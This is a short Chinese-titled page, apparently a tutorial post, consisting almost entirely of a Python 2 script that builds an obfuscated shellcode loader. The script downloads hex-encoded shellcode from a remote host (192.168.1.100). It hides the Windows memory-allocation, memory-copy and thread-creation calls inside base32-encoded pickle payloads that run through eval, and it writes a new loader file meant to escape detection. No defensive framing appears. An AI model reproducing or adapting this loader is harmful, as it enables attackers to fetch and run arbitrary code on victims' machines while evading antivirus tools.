python生成shellcode加载器

import ctypes, cPickle, base64, urllib2

class ptr(object):
    def __reduce__(self):
        return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64

class buf(object):
    def __init__(self, shellcode):
        self.shellcode = shellcode

    def __reduce__(self):
        return (eval, ('ctypes.windll.kernel32.VirtualAlloc(0,len(shellcode),0x1000,0x40)',))

class windll(object):
    def __init__(self, rwxpage, shellcode):
        self.rwxpage = rwxpage
        self.shellcode = shellcode

    def __reduce__(self):
        return (
        eval, ("ctypes.windll.kernel32.RtlMoveMemory(rwxpage,ctypes.create_string_buffer(shellcode),len(shellcode))",))

class ht(object):
    def __init__(self, rwxpage):
        self.rwxpage = rwxpage

    def __reduce__(self):
        return (eval, ("ctypes.windll.kernel32.CreateThread(0,0,rwxpage,0,0,0)",))

class run(object):
    def __init__(self, handle):
        self.handle = handle

    def __reduce__(self):
        return (eval, ("ctypes.windll.kernel32.WaitForSingleObject(handle,-1)",))

if __name__ == '__main__':
    raw_shellcode = ptr()
    ser_shellcode = cPickle.dumps(raw_shellcode)
    enb32_shellcode = base64.b32encode(ser_shellcode)
    shellcode = cPickle.loads(base64.b32decode(enb32_shellcode))

    raw_vir = buf(shellcode)
    ser_vir = cPickle.dumps(raw_vir)
    enb32_vir = base64.b32encode(ser_vir)
    rwxpage = cPickle.loads(base64.b32decode(enb32_vir))

    raw_rtl = windll(rwxpage, shellcode)
    ser_rtl = cPickle.dumps(raw_rtl)
    enb32_rtl = base64.b32encode(ser_rtl)

    raw_handle = ht(rwxpage)
    ser_handle = cPickle.dumps(raw_handle)
    enb32_handle = base64.b32encode(ser_handle)
    handle = cPickle.loads(base64.b32decode(enb32_handle))

    raw_run = run(handle)
    ser_run = cPickle.dumps(raw_run)
    enb32_run = base64.b32encode(ser_run)

    output = '''import ctypes,cPickle,base64,urllib2

                e_shellcode = "{}"
                shellcode = cPickle.loads(base64.b32decode(e_shellcode))
                
                e_rwxpage="{}"
                rwxpage = cPickle.loads(base64.b32decode(e_rwxpage))
                
                e_code = "{}"
                cPickle.loads(base64.b32decode(e_code))
                
                e_handle = "{}"
                handle = cPickle.loads(base64.b32decode(e_handle))
                
                e_run = "{}"
                cPickle.loads(base64.b32decode(e_run))'''.format(enb32_shellcode, enb32_vir, enb32_rtl, enb32_handle, enb32_run)

with open('shellcode.py', 'w') as f:
    f.write(output)
    f.close()

后续